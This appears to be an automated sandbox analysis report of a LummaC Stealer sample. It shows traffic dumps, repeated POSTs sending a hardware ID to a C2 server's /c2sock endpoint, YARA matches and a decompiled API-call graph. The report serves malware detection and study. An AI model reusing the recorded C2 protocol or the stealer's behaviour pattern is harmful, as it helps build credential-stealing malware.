                                                            Nov 13, 2024 10:53:47.815646887 CET4944OUTData Raw: 88 0a 7f ce 30 e7 df 11 43 61 cf 5f 74 5f 29 d6 00 17 3a ff bd 3d dd f9 ef a9 89 83 0a ea e9 0b ca a1 7d ca 84 94 e1 f7 66 b9 36 ea be e7 9c 3c 25 ce bd 7e 73 39 b8 6e fa 2d ce 7f 83 39 ce b0 e0 de f2 71 ba fe a9 0b 82 f7 a7 0d 7d 67 fa 3d e8 77
                                                            Data Ascii: 0Ca_t_):=}f6<%~s9n-9q}g=wIiUM6pvt>pGtWVs(_;Smo+&`5z&pw;/s[`|d3>Kz~0;_
                                                            Nov 13, 2024 10:53:47.815778017 CET2472OUTData Raw: f5 30 c0 66 f6 bf 4a 0c 30 ca ff b0 0e 60 35 b3 40 f2 f6 bf 58 03 6c 32 ff 93 6b 07 a6 f5 bf 85 d7 97 ac ff d5 c0 ff ca 06 68 fd cf 9c 92 8e f5 3f eb 7f 9d d2 ff 0c ee 57 89 ff bd fc b3 f6 c6 f8 9f e3 7e 48 3d fc 2f 6a 7d 3f de eb 9b c9 ff 44 df
                                                            Data Ascii: 0fJ0`5@Xl2kh?W~H=/j}?DoTk2Bwlz0>qh}4d~|X_=zgrC |Q%k`z0?n=rsjd/@9x!
                                                            Nov 13, 2024 10:53:47.815795898 CET4944OUTData Raw: d2 19 fc 2f cd ba 7f d6 ff 1a ef 7f b4 6f fd 2f 9b ff f1 b5 ff b8 ff 55 6c 80 2d de ff 8b f5 01 79 0d 60 b0 07 b8 2d b2 d6 cf 54 17 18 5a 47 30 a5 ff f1 b5 01 b3 f8 9f 69 2e 08 f7 bf b8 de 5f f7 9a 76 e3 0c 10 3e 0b c4 64 7f 51 f3 80 43 eb 00 c6
                                                            Data Ascii: /o/Ul-y`-TZG0i._v>dQCz}?mZ@+}|@\=356X/TEM&A!e+4 3}\_=\ Z3^Xc0_^/z'KkjO_,?
                                                            Nov 13, 2024 10:53:47.820944071 CET4944OUTData Raw: 2b e4 e6 47 35 82 63 fa f5 0c cc 08 e6 56 c8 0d 10 c7 d0 43 cc 67 04 f3 39 22 74 8e cf 11 96 6b 0e a2 a7 17 5e 68 9a 07 2c 67 02 f3 1a c2 5a f8 df 18 cf ff ae f3 fc ef ea 79 5e 0d a0 67 80 37 57 e8 7f 33 a6 bf 5e 77 ff 8b b3 99 0f e8 d5 f3 3f 44
                                                            Data Ascii: +G5cVCg9"tk^h,gZy^g7W3^w?D>:$dZ^UiaW5o=Rg~zg_BM=%Yk:Xk:g/[/u0'$H7v@~Ikcw?&(
                                                            Nov 13, 2024 10:53:47.821868896 CET4944OUTData Raw: bc 38 d7 43 6d 5f d2 7a 80 3a 7d db f5 8c 0f 0a 7a 7e f9 3e 39 9d a9 ef 17 35 81 b0 3c 78 1f 9f ef 8b fa 40 d3 0c 60 1c 83 f5 a1 de 0f fe c7 d7 ff e3 36 c8 d7 00 74 67 04 b7 05 3c 4e ae f5 c7 d7 03 44 7d 20 ce d3 3e ef eb 35 d5 ff 49 ff c3 fb f8
                                                            Data Ascii: 8Cm_z:}z~>95<x@`6tg<ND} >5Ib0_keR3w(vs__P_P>?_w.f~;&}-7HVL} e@fHKIU>ag


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.94998194.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:56.922374964 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:56.922898054 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.94998294.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:54:05.730923891 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:54:05.731324911 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.94998394.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:54:14.671668053 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:54:14.672238111 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.94998494.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:54:23.460114956 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:54:23.460529089 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.94998594.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:54:32.253587008 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:54:32.254940987 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.94998694.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:54:41.037240982 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:54:41.037622929 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:04:51:56
                                                            Start date:13/11/2024
                                                            Path:C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\OlZzqwjrwO.exe"
                                                            Imagebase:0x400000
                                                            File size:476'672 bytes
                                                            MD5 hash:30CA3A9970C190D36EF5AB08D64406E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:04:54:48
                                                            Start date:13/11/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656
                                                            Imagebase:0x4e0000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.9%
                                                              Dynamic/Decrypted Code Coverage:11.1%
                                                              Signature Coverage:51.5%
                                                              Total number of Nodes:787
                                                              Total number of Limit Nodes:26
                                                              execution_graph 73280 4102d1 73283 447a80 73280->73283 73286 44e224 73283->73286 73287 4102da 73286->73287 73288 44e22f RtlFreeHeap 73286->73288 73288->73287 73289 44e244 GetLastError 73288->73289 73290 44e251 __dosmaperr 73289->73290 73292 4447a4 14 API calls __dosmaperr 73290->73292 73292->73287 73293 4069a1 73314 4069ba _unexpected 73293->73314 73297 40738c 73298 408a5a lstrcatW lstrcatW 73315 40e14e 73298->73315 73299 406aed lstrcatW lstrcatW 73299->73314 73300 407722 lstrcatW lstrcatW 73300->73314 73304 408a43 73338 404710 46 API calls 73304->73338 73307 40620b 166 API calls 73307->73314 73312 405aaa 178 API calls 73312->73314 73313 4360e1 15 API calls 73313->73314 73314->73297 73314->73298 73314->73299 73314->73300 73314->73304 73314->73307 73314->73312 73314->73313 73329 403ead 47 API calls _strlen 73314->73329 73330 404d0b 16 API calls ___from_strstr_to_strchr 73314->73330 73331 404edc 16 API calls 73314->73331 73332 4034bc 46 API calls 73314->73332 73333 403d1e 46 API calls 73314->73333 73334 40476b 99 API calls 73314->73334 73335 404710 46 API calls 73314->73335 73336 4034fd 101 API calls 73314->73336 73337 404f20 16 API calls 73314->73337 73327 40e172 _unexpected 73315->73327 73316 408a85 73318 40d994 155 API calls 73318->73327 73319 40b81c 43 API calls 73319->73327 73320 40f53e lstrcatW lstrcatW lstrcatW 73320->73327 73323 40e7bc lstrcatW 73325 40e14e 155 API calls 73323->73325 73324 40e14e 155 API calls 73324->73327 73325->73327 73326 40e54f lstrcatW lstrcatW 73326->73327 73327->73316 73327->73318 73327->73319 73327->73320 73327->73323 73327->73324 73327->73326 73328 447a80 14 API calls ___std_exception_copy 73327->73328 73339 40b129 73327->73339 73351 438e28 73327->73351 73359 419e6b 73327->73359 73328->73327 73329->73314 73330->73314 73331->73314 73332->73314 73333->73314 73334->73314 73335->73314 73336->73314 73337->73314 73338->73298 73349 40b13c _unexpected 73339->73349 73340 40b494 73341 40b81c 41 API calls 73341->73349 73342 438e28 LoadLibraryW GetPEB lstrcmpiW 73342->73349 73343 40b129 41 API calls 73343->73349 73344 40b759 NtReadFile 73345 438e28 3 API calls 73344->73345 73348 40b7ab NtClose 73345->73348 73347 40a928 41 API calls 73347->73349 73348->73327 73349->73340 73349->73341 73349->73342 73349->73343 73349->73344 73349->73347 73350 447e24 15 API calls ___std_exception_copy 73349->73350 73367 40b7bb 73349->73367 73350->73349 73358 438e45 73351->73358 73352 43935b LoadLibraryW 73352->73358 73353 43a4fe GetPEB lstrcmpiW 73353->73358 73354 439535 GetPEB lstrcmpiW 73354->73358 73355 43b362 GetPEB lstrcmpiW 73355->73358 73356 438e28 GetPEB lstrcmpiW 73356->73358 73357 439136 73357->73327 73358->73352 73358->73353 73358->73354 73358->73355 73358->73356 73358->73357 73360 419e88 73359->73360 73365 41a1d4 73360->73365 73423 418b8f 73360->73423 73426 41831a 119 API calls _wctomb_s 73360->73426 73427 419496 106 API calls 3 library calls 73360->73427 73428 4137c1 16 API calls 2 library calls 73360->73428 73429 41900a 46 API calls 2 library calls 73360->73429 73365->73327 73365->73365 73373 40a928 73367->73373 73370 40b812 73370->73349 73371 438e28 3 API calls 73372 40b807 NtClose 73371->73372 73372->73370 73374 40a941 _unexpected 73373->73374 73375 438e28 3 API calls 73374->73375 73386 40a956 _unexpected 73375->73386 73376 40b02e lstrcatW lstrlenW 73376->73386 73378 40af6b NtCreateFile 73383 438e28 3 API calls 73378->73383 73379 40ac51 lstrlenW 73379->73386 73380 40acba lstrcatW 73380->73386 73381 438e28 3 API calls 73381->73386 73382 40b129 38 API calls 73382->73386 73383->73386 73384 40a928 38 API calls 73384->73386 73385 40ae4c 73385->73370 73385->73371 73386->73376 73386->73378 73386->73379 73386->73380 73386->73381 73386->73382 73386->73384 73386->73385 73387 40b7bb 38 API calls 73386->73387 73388 40b81c 73386->73388 73387->73386 73413 40b835 __fread_nolock _unexpected 73388->73413 73389 40d7fe lstrlenW 73389->73413 73390 40d817 lstrlenW 73390->73413 73391 40d3c0 lstrcmpW 73391->73413 73392 40d891 lstrcmpW 73392->73413 73393 40d352 73393->73386 73394 40d120 NtQueryDirectoryFile 73394->73413 73395 40d6a1 lstrcmpW 73395->73413 73396 40b129 26 API calls 73396->73413 73397 40c8cc lstrcmpW 73397->73413 73398 40c8fe lstrlenW 73398->73413 73399 40cdde lstrcatW 73399->73413 73400 438e28 3 API calls 73409 40cced NtCreateFile 73400->73409 73401 40b81c 26 API calls 73401->73413 73402 40c3a9 lstrcmpW 73402->73413 73403 40c57e lstrlenW 73403->73413 73404 438e28 3 API calls 73410 40d547 NtClose 73404->73410 73405 438e28 LoadLibraryW GetPEB lstrcmpiW 73405->73413 73406 40cc06 lstrcatW lstrcatW 73406->73413 73407 40b7bb 26 API calls 73407->73413 73409->73413 73410->73413 73411 40a928 26 API calls 73411->73413 73412 40c415 lstrcatW lstrcatW 73412->73413 73413->73389 73413->73390 73413->73391 73413->73392 73413->73393 73413->73394 73413->73395 73413->73396 73413->73397 73413->73398 73413->73399 73413->73400 73413->73401 73413->73402 73413->73403 73413->73404 73413->73405 73413->73406 73413->73407 73413->73411 73413->73412 73414 447e24 73413->73414 73419 44eb6f _unexpected 73414->73419 73415 44ebad 73422 4447a4 14 API calls __dosmaperr 73415->73422 73417 44eb98 RtlAllocateHeap 73418 44ebab 73417->73418 73417->73419 73418->73413 73419->73415 73419->73417 73421 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 73419->73421 73421->73419 73422->73418 73430 418ba2 73423->73430 73425 418b9e 73425->73360 73426->73360 73427->73360 73428->73360 73429->73360 73431 418bb9 _strlen 73430->73431 73442 418c73 73430->73442 73432 447a80 ___std_exception_copy 14 API calls 73431->73432 73433 418bfe 73431->73433 73431->73442 73432->73433 73434 418c33 73433->73434 73437 418cf3 73433->73437 73433->73442 73441 418c68 73434->73441 73448 415039 46 API calls 73434->73448 73436 447a80 ___std_exception_copy 14 API calls 73436->73442 73437->73441 73443 44614f GetSystemTimeAsFileTime 73437->73443 73439 418e08 73445 417099 73439->73445 73441->73436 73441->73442 73442->73425 73444 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 73443->73444 73444->73439 73449 44575f 73445->73449 73447 4170be 73447->73441 73448->73441 73450 44576a 73449->73450 73451 44578d 73450->73451 73452 44577a 73450->73452 73453 44579f 73451->73453 73464 4457b2 73451->73464 73495 4447a4 14 API calls __dosmaperr 73452->73495 73497 4447a4 14 API calls __dosmaperr 73453->73497 73456 44577f 73496 44e2f7 29 API calls __wfreopen_s 73456->73496 73457 4457a4 73498 44e2f7 29 API calls __wfreopen_s 73457->73498 73458 4457d2 73499 4447a4 14 API calls __dosmaperr 73458->73499 73459 4457e3 73487 453aae 73459->73487 73461 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 73461->73447 73464->73458 73464->73459 73468 4457fa 73469 4459ee 73468->73469 73507 45373d 73468->73507 73526 44e307 11 API calls CallUnexpected 73469->73526 73472 4459f8 73473 44580c 73473->73469 73514 453769 73473->73514 73475 44581e 73475->73469 73476 445827 73475->73476 73477 4458ac 73476->73477 73478 445848 73476->73478 73524 4537d0 29 API calls 3 library calls 73477->73524 73521 4537d0 29 API calls 3 library calls 73478->73521 73481 4458b3 73481->73461 73525 453a5a 29 API calls 2 library calls 73481->73525 73482 445860 73482->73461 73522 453a5a 29 API calls 2 library calls 73482->73522 73485 445879 73485->73461 73523 4537d0 29 API calls 3 library calls 73485->73523 73488 453aba ___scrt_is_nonwritable_in_current_image 73487->73488 73489 4457e8 73488->73489 73527 44d13d EnterCriticalSection 73488->73527 73500 453711 73489->73500 73491 453acb 73494 453adf 73491->73494 73528 453ff7 73491->73528 73540 453b02 LeaveCriticalSection CallUnexpected 73494->73540 73495->73456 73496->73461 73497->73457 73498->73461 73499->73461 73501 453732 73500->73501 73502 45371d 73500->73502 73501->73468 73603 4447a4 14 API calls __dosmaperr 73502->73603 73504 453722 73604 44e2f7 29 API calls __wfreopen_s 73504->73604 73506 45372d 73506->73468 73508 45375e 73507->73508 73509 453749 73507->73509 73508->73473 73605 4447a4 14 API calls __dosmaperr 73509->73605 73511 45374e 73606 44e2f7 29 API calls __wfreopen_s 73511->73606 73513 453759 73513->73473 73515 453775 73514->73515 73516 45378a 73514->73516 73607 4447a4 14 API calls __dosmaperr 73515->73607 73516->73475 73518 45377a 73608 44e2f7 29 API calls __wfreopen_s 73518->73608 73520 453785 73520->73475 73521->73482 73522->73485 73523->73461 73524->73481 73525->73461 73526->73472 73527->73491 73541 453b0b 73528->73541 73531 454053 73559 453bc4 73531->73559 73533 45404a 73553 453d65 73533->73553 73535 454050 73536 44e224 __freea 14 API calls 73535->73536 73537 45405e 73536->73537 73582 43d298 5 API calls ___raise_securityfailure 73537->73582 73539 45406b 73539->73494 73540->73489 73583 45af54 73541->73583 73544 453b31 73544->73531 73544->73533 73546 453b52 73549 44e224 __freea 14 API calls 73546->73549 73548 45af54 42 API calls 73550 453b6a 73548->73550 73549->73544 73550->73546 73551 453b74 73550->73551 73552 44e224 __freea 14 API calls 73551->73552 73552->73544 73554 453d75 73553->73554 73555 453769 29 API calls 73554->73555 73556 453d96 73555->73556 73598 44e307 11 API calls CallUnexpected 73556->73598 73558 453ff6 73560 453bd4 73559->73560 73561 453769 29 API calls 73560->73561 73562 453bf1 73561->73562 73563 453d13 73562->73563 73564 453711 29 API calls 73562->73564 73602 44e307 11 API calls CallUnexpected 73563->73602 73566 453c03 73564->73566 73566->73563 73568 45373d 29 API calls 73566->73568 73567 453d1d 73569 453c15 73568->73569 73569->73563 73570 453c1e 73569->73570 73571 44e224 __freea 14 API calls 73570->73571 73572 453c29 GetTimeZoneInformation 73571->73572 73573 453c45 73572->73573 73574 453cf0 73572->73574 73575 453c79 _wctomb_s 73573->73575 73574->73535 73599 4512d8 41 API calls 2 library calls 73575->73599 73577 453cc8 73600 453b82 43 API calls 3 library calls 73577->73600 73579 453cd9 73601 453b82 43 API calls 3 library calls 73579->73601 73581 453ced 73581->73574 73582->73539 73584 45af5f ___scrt_is_nonwritable_in_current_image 73583->73584 73585 44d13d CallUnexpected EnterCriticalSection 73584->73585 73586 45af76 73585->73586 73587 45b042 42 API calls 73586->73587 73588 45af8c 73587->73588 73589 45afb5 LeaveCriticalSection 73588->73589 73590 453b2a 73589->73590 73590->73544 73591 44eb6f 73590->73591 73592 44ebad 73591->73592 73596 44eb7d _unexpected 73591->73596 73593 4447a4 __dosmaperr 14 API calls 73592->73593 73595 44ebab 73593->73595 73594 44eb98 RtlAllocateHeap 73594->73595 73594->73596 73595->73546 73595->73548 73596->73592 73596->73594 73597 44e560 _unexpected EnterCriticalSection LeaveCriticalSection 73596->73597 73597->73596 73598->73558 73599->73577 73600->73579 73601->73581 73602->73567 73603->73504 73604->73506 73605->73511 73606->73513 73607->73518 73608->73520 73609 43c910 73610 43c91c ___scrt_is_nonwritable_in_current_image 73609->73610 73635 43cbbb 73610->73635 73612 43c923 73613 43ca76 73612->73613 73621 43c94d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 73612->73621 73658 43ce95 4 API calls 2 library calls 73613->73658 73615 43ca7d 73651 443854 73615->73651 73619 43ca8b 73620 43c96c 73621->73620 73622 43c9ed 73621->73622 73654 44389e 41 API calls 3 library calls 73621->73654 73643 43ce0e GetStartupInfoW _wctomb_s 73622->73643 73624 43c9f3 73644 42f1a8 73624->73644 73629 43ca0f 73629->73615 73630 43ca13 73629->73630 73631 43ca1c 73630->73631 73656 443880 23 API calls CallUnexpected 73630->73656 73657 43cbf4 77 API calls ___scrt_uninitialize_crt 73631->73657 73634 43ca24 73634->73620 73636 43cbc4 73635->73636 73660 43d0b8 IsProcessorFeaturePresent 73636->73660 73638 43cbd0 73661 43d5c2 10 API calls 2 library calls 73638->73661 73640 43cbd5 73641 43cbd9 73640->73641 73662 43d5e1 7 API calls 2 library calls 73640->73662 73641->73612 73643->73624 73645 42f1ad 73644->73645 73663 42d658 73645->73663 73688 422177 73645->73688 73696 4245ec 73645->73696 73705 4244e4 GetPEB 73645->73705 73646 42f1bd 73655 43ce3f GetModuleHandleW 73646->73655 74072 443a0a 73651->74072 73654->73622 73655->73629 73656->73631 73657->73634 73658->73615 73659 44386a 23 API calls CallUnexpected 73659->73619 73660->73638 73661->73640 73662->73641 73684 42d66d 73663->73684 73664 42d658 281 API calls 73664->73684 73665 41a28f 182 API calls 73665->73684 73666 422177 58 API calls 73666->73684 73667 42f265 GetPEB 73667->73684 73668 42f19d 73668->73646 73669 4269e4 GetPEB GetPEB 73669->73684 73672 419b9d 72 API calls 73672->73684 73673 4244e4 3 API calls 73673->73684 73675 4360e1 15 API calls 73675->73684 73679 4245ec 58 API calls 73679->73684 73681 42f1c2 GetPEB NtClose GetPEB 73681->73684 73684->73664 73684->73665 73684->73666 73684->73667 73684->73668 73684->73669 73684->73672 73684->73673 73684->73675 73684->73679 73684->73681 73686 40e14e 161 API calls 73684->73686 73709 402fcc LoadLibraryA LoadLibraryA 73684->73709 73719 401ff9 73684->73719 73730 402476 73684->73730 73743 430228 73684->73743 73756 436adc 73684->73756 73773 434080 73684->73773 73789 433c10 73684->73789 73799 421eeb 73684->73799 73805 4224a3 73684->73805 73811 42cfba 73684->73811 73822 4262a1 73684->73822 73686->73684 73690 422191 73688->73690 73689 422398 NtQueryInformationProcess 73689->73690 73690->73689 73691 42245b GetPEB 73690->73691 73693 4279e0 GetPEB 73690->73693 73694 422491 73690->73694 74070 41f916 GetPEB VirtualQuery 73690->74070 74071 41ebeb 58 API calls 73690->74071 73691->73690 73693->73690 73694->73646 73699 424605 73696->73699 73697 4247ff NtQuerySystemInformation 73697->73699 73698 4247b0 GetPEB 73698->73699 73699->73697 73699->73698 73700 4279e0 GetPEB 73699->73700 73701 424980 73699->73701 73702 4262a1 56 API calls 73699->73702 73703 4224a3 GetPEB NtQueryInformationProcess GetPEB 73699->73703 73704 422177 56 API calls 73699->73704 73700->73699 73701->73646 73702->73699 73703->73699 73704->73699 73706 424502 73705->73706 73707 4279e0 GetPEB 73706->73707 73708 4245d2 NtSetInformationThread 73706->73708 73707->73706 73708->73646 73710 402ff9 73709->73710 73712 403349 73710->73712 73714 4033ee 73710->73714 73715 401ff9 6 API calls 73710->73715 73717 402fcc 6 API calls 73710->73717 73718 402476 6 API calls 73710->73718 73711 402fcc 6 API calls 73711->73712 73712->73710 73712->73711 73713 40112c 6 API calls 73712->73713 73839 40112c 8 API calls __aullrem 73712->73839 73713->73712 73714->73684 73715->73710 73717->73710 73718->73710 73720 40200e 73719->73720 73721 402221 73720->73721 73722 401c1e 6 API calls 73720->73722 73723 402426 ExitProcess 73720->73723 73724 402fcc 6 API calls 73720->73724 73725 402083 73720->73725 73840 401c1e 73720->73840 73721->73684 73721->73721 73722->73720 73724->73720 73725->73720 73727 40112c 6 API calls 73725->73727 73727->73725 73728 4020ce Sleep 73729 401c1e 6 API calls 73728->73729 73729->73720 73740 402482 73730->73740 73731 402af0 GetComputerNameW 73731->73740 73732 402be1 GetUserNameW 73732->73740 73733 401ff9 6 API calls 73733->73740 73734 402b69 73734->73684 73735 40112c 6 API calls 73741 402555 73735->73741 73736 402476 6 API calls 73736->73740 73737 402476 6 API calls 73737->73741 73738 401ff9 6 API calls 73738->73741 73739 401c1e 6 API calls 73739->73740 73740->73731 73740->73732 73740->73733 73740->73734 73740->73736 73740->73739 73740->73741 73742 402fcc 6 API calls 73740->73742 73741->73735 73741->73737 73741->73738 73741->73740 73742->73740 73753 43023b _unexpected 73743->73753 73744 4309a8 73744->73684 73745 430228 206 API calls 73745->73753 73746 42f625 206 API calls 73746->73753 73747 447e24 ___std_exception_copy 15 API calls 73747->73753 73748 42f278 206 API calls 73748->73753 73749 438e28 3 API calls 73749->73753 73750 42fd35 206 API calls 73750->73753 73751 40b81c 43 API calls 73751->73753 73752 447a80 ___std_exception_copy 14 API calls 73752->73753 73753->73744 73753->73745 73753->73746 73753->73747 73753->73748 73753->73749 73753->73750 73753->73751 73753->73752 73755 40b7bb 43 API calls 73753->73755 73847 41f9a4 73753->73847 73755->73753 73769 436af4 __fread_nolock _unexpected _wctomb_s _strlen 73756->73769 73757 438e28 3 API calls 73762 438a76 GetPhysicallyInstalledSystemMemory 73757->73762 73758 438019 73758->73684 73759 438e28 LoadLibraryW GetPEB lstrcmpiW 73759->73769 73760 434fac 15 API calls 73760->73769 73761 436adc 176 API calls 73761->73769 73762->73769 73763 438b8c EnumDisplayDevicesA 73763->73769 73764 437265 KiUserCallbackDispatcher 73764->73769 73765 419e6b 127 API calls 73765->73769 73766 44568a 29 API calls 73766->73769 73768 434040 46 API calls 73768->73769 73769->73757 73769->73758 73769->73759 73769->73760 73769->73761 